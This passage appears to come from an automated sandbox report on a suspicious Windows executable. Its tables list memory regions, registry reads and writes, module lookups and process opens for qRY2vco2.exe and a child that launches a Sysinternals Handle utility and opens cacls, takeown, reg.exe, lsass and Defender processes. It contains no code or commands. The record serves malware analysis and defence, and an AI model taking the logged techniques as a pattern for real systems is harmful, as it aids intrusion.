| private_0x000000007f798000 | 0x7f798000 | 0x7f79afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f79b000 | 0x7f79b000 | 0x7f79dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f79e000 | 0x7f79e000 | 0x7f79efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x270, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #238: qry2vco264.exe
491
0
| Information | Value |
|---|---|
| ID | #238 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe |
| Command Line | qRY2vco2.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x554 |
| Parent PID | 0x14c (c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
878
0x
1B4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00346fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x00600000 | 0x00633fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0070efff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x008d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x01cdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0f4000 | 0x7f0f4000 | 0x7f0f4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| qry2vco264.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff8000 | 0x7ff5ffff8000 | 0x7ff5ffff8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4fd60000 | 0x7ffc4fe09fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffc57460000 | 0x7ffc57537fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (117)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\conhost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
7 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\commands-xerox-relationship.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\recorder.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\shift.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\unsubscribe-wisdom.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\shoe-associations.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\israeli-runtime-recommendation.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\les lodging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\normally.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\dir.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\baseball-showing-idaho.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\returned.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\sweden_decorative_wit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\se-viii.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows multimedia platform\separate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\bulgaria.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\advertisement-beginners.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\semiconductorphysfisheries.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\medicare.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\spain-chart.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\females-ward.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\beast.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\msfeedssync.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\consent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\mpcmdrun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (67)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffc57b50000 |
|
15 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffc558202a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffc558223f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffc558163c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffc5581d920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffc55825620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffc55825580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffc558255e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffc55820e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffc5581f110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffc57b8cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffc57b95790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffc57b8ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffc558228c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffc57b8c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffc57b95410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffc57be42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffc57bc95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffc57be3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffc55820fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffc55842720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffc550fe7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffc558428e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffc55816010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffc55842a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffc55820310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffc55842bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffc558225d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffc55842cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffc55816000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffc550945e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffc558165a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffc5581e960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffc57be36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffc57be3790 |
|
1 | |
